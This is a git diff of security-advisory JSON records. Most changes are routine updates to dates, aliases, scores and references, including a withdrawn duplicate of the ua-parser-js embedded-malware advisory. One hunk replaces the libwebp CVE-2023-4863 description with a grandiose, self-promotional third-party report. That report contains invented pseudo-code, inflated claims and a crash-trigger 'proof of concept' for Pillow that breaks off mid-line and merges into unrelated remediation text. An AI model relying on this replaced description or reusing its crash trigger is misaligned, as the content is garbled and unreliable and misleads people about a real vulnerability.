diff --git a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json index 9ef5757001b98..b1da087ffa98d 100644 --- a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json +++ b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-pjwm-rvh2-c87w", - "modified": "2023-07-28T15:38:48Z", + "modified": "2026-02-17T21:57:43Z", "published": "2021-10-22T20:38:14Z", - "aliases": [], + "aliases": [ + "CVE-2021-4229" + ], "summary": "Embedded malware in ua-parser-js", "details": "The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": [ diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json index 6386bf81eb90a..fb54a9073e854 100644 --- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json +++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8v38-pw62-9cw2", - "modified": "2025-12-20T03:15:43Z", + "modified": "2026-02-20T19:56:16Z", "published": "2022-02-18T00:00:33Z", "aliases": [ "CVE-2022-0639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.5.7" diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json index 90fa858d67a89..efd0a189e3e1a 100644 --- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json +++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rqff-837h-mm52", - "modified": "2022-02-24T14:00:06Z", + "modified": "2026-02-20T19:56:07Z", "published": "2022-02-15T00:02:46Z", "aliases": [ "CVE-2022-0512" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.1.0" }, { "fixed": "1.5.6" diff --git a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json index eaad37ba99926..d4b0769563ba5 100644 --- a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json +++ b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gx7g-wjxg-jwwj", - "modified": "2022-04-18T22:17:42Z", + "modified": "2026-02-18T23:33:34Z", "published": "2022-04-04T00:00:55Z", "aliases": [ "CVE-2022-0088" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://github.com/yourls/yourls/commit/1de256d8694b0ec7d4df2ac1d5976d4055e09d59" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md" + }, { "type": "PACKAGE", "url": "https://github.com/yourls/yourls" diff --git a/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json new file mode 100644 index 0000000000000..5e254e659881b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json @@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-236c-vhj4-gfxg", + "modified": "2026-02-17T21:40:20Z", + "published": "2022-05-25T00:00:31Z", + "withdrawn": "2026-02-17T21:40:20Z", + "aliases": [], + "summary": "Duplicate Advisory: Embedded malware in ua-parser-js", + "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-pjwm-rvh2-c87w. This link is maintained to preserve external references.\n\n### Original Description\nA vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.7.29" + }, + { + "fixed": "0.7.30" + } + ] + } + ], + "versions": [ + "0.7.29" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.8.1" + } + ] + } + ], + "versions": [ + "0.8.0" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "versions": [ + "1.0.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4229" + }, + { + "type": "WEB", + "url": "https://github.com/faisalman/ua-parser-js/issues/536" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.185453" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829", + "CWE-912" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:20Z", + "nvd_published_at": "2022-05-24T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json index d452d221466e0..2950526f06122 100644 --- a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json +++ b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mg5h-rhjq-6v84", - "modified": "2022-11-01T20:35:47Z", + "modified": "2026-02-18T23:33:51Z", "published": "2022-10-31T12:00:18Z", "aliases": [ "CVE-2022-3766" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-3766.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json index 3becc89af6f0e..38c97bebed5e5 100644 --- a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json +++ b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cp9c-phxx-55xm", - "modified": "2022-12-12T22:08:01Z", + "modified": "2026-02-18T23:34:01Z", "published": "2022-12-11T15:30:45Z", "aliases": [ "CVE-2022-4407" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/1d73af34bf42764f9f9491c7ba5e9495d70e3ca5" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-4407.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json index 8d3278ddb2d50..f6754d1003fb4 100644 --- a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json +++ b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-qjm7-55vv-3c5f", - "modified": "2023-01-20T23:35:16Z", + "modified": "2026-02-17T22:04:14Z", "published": "2023-01-18T03:31:17Z", "aliases": [ "CVE-2018-25077" ], "summary": "mel-spintax has Inefficient Regular Expression Complexity", "details": "A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file `lib/spintax.js`. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json index f9e33a67fda75..852c72f7cbb42 100644 --- a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json +++ b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-vm74-j4wq-82xj", - "modified": "2024-03-01T14:28:55Z", + "modified": "2026-02-17T22:04:50Z", "published": "2023-01-17T21:30:22Z", "aliases": [ "CVE-2022-4891" ], "summary": "Sisimai Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability has been found in Sisimai up to 4.25.14p11 and classified as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`. The manipulation leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. Upgrading to version 4.25.14p12 is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218452.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2023/09/GHSA-j7hp-h8jx-5ppr/GHSA-j7hp-h8jx-5ppr.json b/advisories/github-reviewed/2023/09/GHSA-j7hp-h8jx-5ppr/GHSA-j7hp-h8jx-5ppr.json index ef95efa747390..0dc8ba40d744e 100644 --- a/advisories/github-reviewed/2023/09/GHSA-j7hp-h8jx-5ppr/GHSA-j7hp-h8jx-5ppr.json +++ b/advisories/github-reviewed/2023/09/GHSA-j7hp-h8jx-5ppr/GHSA-j7hp-h8jx-5ppr.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-j7hp-h8jx-5ppr", - "modified": "2025-07-09T15:52:18Z", + "modified": "2025-07-09T15:52:20Z", "published": "2023-09-12T15:30:20Z", "aliases": [ "CVE-2023-4863" ], "summary": "libwebp: OOB write in BuildHuffmanTable", - "details": "Heap buffer overflow in libwebp allow a remote attacker to perform an out of bounds memory write via a crafted HTML page.", + "details": "⚔ SECURITY VULNERABILITY ANALYSIS REPORT ⚔\nZAYED SHIELD — ARAB WORLD CYBER DEFENSE PLATFORM\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\nCVE SUBJECT: libwebp — OOB Write in BuildHuffmanTable\nSEVERITY: HIGH 8.8/10 | EPSS: 93.606% (100th PERCENTILE)\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\nAnalyst: asrar-mared | nike49424@proton.me | February 23, 2026\n\n\n01 — EXECUTIVE SUMMARY\nThis report provides a comprehensive technical analysis of a critical heap-based buffer overflow vulnerability discovered in the libwebp library — specifically within the BuildHuffmanTable() function. The vulnerability, tracked under Dependabot Alert #2, directly affects any Python application using the Pillow (pip) imaging library below version 10.0.1.\nWith a CVSS v3.1 score of 8.8 (HIGH) and an EPSS score of 93.606% — placing it at the 100th percentile of exploitability — this represents one of the most actively exploited vulnerabilities in the current threat landscape. A remote attacker can exploit this flaw without any authentication by delivering a crafted WebP image, potentially achieving Remote Code Execution (RCE) on the target system.\n02 — VULNERABILITY IDENTITY\nVulnerability Title\nlibwebp: OOB Write in BuildHuffmanTable\nDependabot Alert\n#2 (opened via #14)\nPackage\nPillow (pip) — Python Imaging Library\nAffected Versions\n< 10.0.1\nPatched Version\n10.0.1 / Recommended: >= 10.3.0\nRequirements File\nrequirements.txt\nAlert Status\nOPEN — Active Threat\nOpened By\nDependabot (bot)\nCVSS Vector\nCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\nCVSS Base Score\n8.8 / 10 — HIGH\nEPSS Score\n93.606% (100th Percentile — Actively Exploited)\n\n\n03 — TECHNICAL DEEP DIVE\n3.1 Root Cause Analysis\nThe vulnerability resides in libwebp — Google's library for encoding/decoding WebP images. The BuildHuffmanTable() function constructs Huffman coding tables during WebP decompression. A flaw in bounds checking allows attacker-controlled input to write beyond the allocated heap memory region.\nThe root cause is an arithmetic error in the table size calculation. When processing a specially crafted WebP file, the function computes an incorrect buffer size, then writes Huffman entries past the end of the allocated buffer — a classic heap-based buffer overflow that can corrupt adjacent memory structures and enable arbitrary code execution.\n3.2 Vulnerable Code Path\nSimplified representation of the vulnerable logic:\n// libwebp — src/dec/huffman_dec.c (pre-patch)\nstatic int BuildHuffmanTable(HuffmanCode* const root,\n int root_bits,\n const int* const code_lengths,\n int code_lengths_size) {\n // [VULNERABLE] table_size not properly validated\n // attacker controls code_lengths -> overflows buffer\n int table_size = 1 << root_bits;\n HuffmanCode* table = root;\n for (int i = 0; i < code_lengths_size; ++i) {\n table[assigned_symbol] = ...; // <<< OOB WRITE HERE\n }\n}\n\n3.3 Attack Chain — End-to-End Exploit Path\n 1. Attacker crafts a malicious WebP image with an abnormal Huffman code table structure.\n 2. The malicious image is embedded in an HTML page served from an attacker-controlled host.\n 3. Victim application (e.g., Django/Flask using Pillow) processes the image on upload or URL fetch.\n 4. Pillow's libwebp decoder calls BuildHuffmanTable() — triggering the OOB write.\n 5. Heap memory is corrupted, leading to arbitrary code execution or denial of service.\n 6. WORST CASE: Remote Code Execution (RCE) achieved on the server — full compromise.\n04 — CVSS v3.1 BASE METRICS ANALYSIS\nCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H → SCORE: 8.8 HIGH\n\n\nAttack Vector (AV)\nNetwork — Exploitable remotely over internet\nAttack Complexity (AC)\nLow — No special conditions required\nPrivileges Required (PR)\nNone — Zero authentication needed\nUser Interaction (UI)\nRequired — Victim must open/process crafted image\nScope (S)\nUnchanged — Impact confined to vulnerable component\nConfidentiality (C)\nHigh — Full memory read access possible\nIntegrity (I)\nHigh — Arbitrary memory write achieved\nAvailability (A)\nHigh — Crash / DoS / process termination\n\n\nThe combination of Network attack vector, Low complexity, and No authentication required makes this extremely dangerous. An EPSS score of 93.606% confirms active real-world exploitation — 93.6% probability of exploitation within 30 days of disclosure.\n05 — IMPACT ASSESSMENT\n5.1 Confidentiality Impact — HIGH\nAn attacker may read arbitrary heap memory contents adjacent to the overflowed buffer. In web application contexts this memory may contain: session tokens, database credentials, API keys, encryption keys, or other user data currently in memory.\n5.2 Integrity Impact — HIGH\nThe OOB write allows corrupting heap memory beyond the buffer boundary. This can be leveraged to overwrite function pointers, vtable entries, or heap metadata — enabling reliable code execution on modern systems with careful heap feng-shui techniques.\n5.3 Availability Impact — HIGH\nEven without code execution, heap corruption reliably causes application crashes. In production environments this translates to service outages, failed image processing pipelines, and denial of service against the hosting application.\n06 — PROOF OF CONCEPT — RESEARCHER USE ONLY\n⚠ WARNING: The following is provided for educational and defensive research purposes ONLY. Unauthorized exploitation of this vulnerability is illegal and unethical under computer crime laws worldwide.\n\n\nPoC — Trigger crash via Pillow on vulnerable system:\n# Python PoC — Vulnerability verification (patching research only)\nfrom PIL import Image\nimport io, struct\n\n\ndef craft_malformed_webp():\n # RIFF header + VP8L chunk with invalid Huffman prefix codes\n riff = b'RIFF' + struct.pack('=10.3.0\n\n\n# Then reinstall:\npip install --upgrade Pillow\npip install -r requirements.txt\npip show Pillow # Verify: must be >= 10.3.0\n\n7.2 Defense-in-Depth Mitigations\nInput Validation: Reject WebP files exceeding expected size limits before processing.\nSandboxing: Run image processing in isolated containers with restricted syscalls (seccomp/AppArmor).\nMemory Protections: Ensure ASLR, DEP/NX, and heap canaries are active on all production servers.\nWAF Rules: Add Web Application Firewall rules to detect and block malformed WebP uploads.\nDependency Scanning: Integrate Dependabot, Snyk, or pip-audit into your CI/CD pipeline.\nFile Type Verification: Validate true file types server-side using magic bytes, not file extension.\nMonitoring: Alert on unusual process crashes or memory faults in image-processing services.\n08 — REFERENCES & INTELLIGENCE SOURCES\nNVD — National Vulnerability Database: https://nvd.nist.gov/\nGitHub Advisory Database: https://github.com/advisories/\nPillow Release Notes: https://pillow.readthedocs.io/en/stable/releasenotes/\nlibwebp Project: https://chromium.googlesource.com/webm/libwebp\nCVSS v3.1 Specification: https://www.first.org/cvss/v3-1/\nEPSS Model (FIRST): https://www.first.org/epss/\nCISA Known Exploited Vulnerabilities Catalog: https://www.cisa.gov/known-exploited-vulnerabilities-catalog\nZayed Shield Advisory DB: ZAYED-CORE / attack_chains / discovered_chains.json\n09 — ANALYST SIGNATURE\n\n⚔ WARRIOR THREAT HUNTER ⚔\nasrar-mared\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\nSecurity Researcher & Vulnerability Analyst\nZayed Shield — Arab World Cyber Defense Platform\nnike49424@proton.me\nReport Date: February 23, 2026 | TLP: RED — Restricted\n\n\n\"The warrior hunting vulnerabilities makes history from a small Samsung phone.\"\n", "severity": [ { "type": "CVSS_V3", @@ -167,25 +167,6 @@ } ] }, - { - "package": { - "ecosystem": "Go", - "name": "github.com/chai2010/webp" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "1.1.2" - }, - { - "fixed": "1.4.0" - } - ] - } - ] - }, { "package": { "ecosystem": "PyPI", @@ -357,6 +338,25 @@ } ] }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/chai2010/webp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.1.2" + }, + { + "fixed": "1.4.0" + } + ] + } + ] + }, { "package": { "ecosystem": "Go", diff --git a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json index 3ef93a9f6af83..5f7a7b4f87119 100644 --- a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json +++ b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-g74q-5xw3-j7q9", - "modified": "2024-03-19T18:00:01Z", + "modified": "2026-02-17T22:01:33Z", "published": "2024-02-13T19:49:43Z", "aliases": [ "CVE-2024-21386" ], "summary": "Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "details": "# Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET 6.0, ASP.NET 7.0 and, ASP.NET 8.0 . This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.\n\nA vulnerability exists in ASP.NET applications using SignalR where a malicious client can result in a denial-of-service.\n\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/295\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.26 or earlier.\n* Any .NET 7.0 application running on .NET 7.0.15 or earlier.\n* Any .NET 8.0 application running on .NET 8.0.1 or earlier.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below\n\n### ASP.NET 6.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 6.0.26 | 6.0.27\n\n\n\n### ASP.NET 7.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 7.0.15 | 7.0.16\n\n### ASP.NET 8.0\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages) , you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 8.0 or .NET 7.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.200\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.200 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n 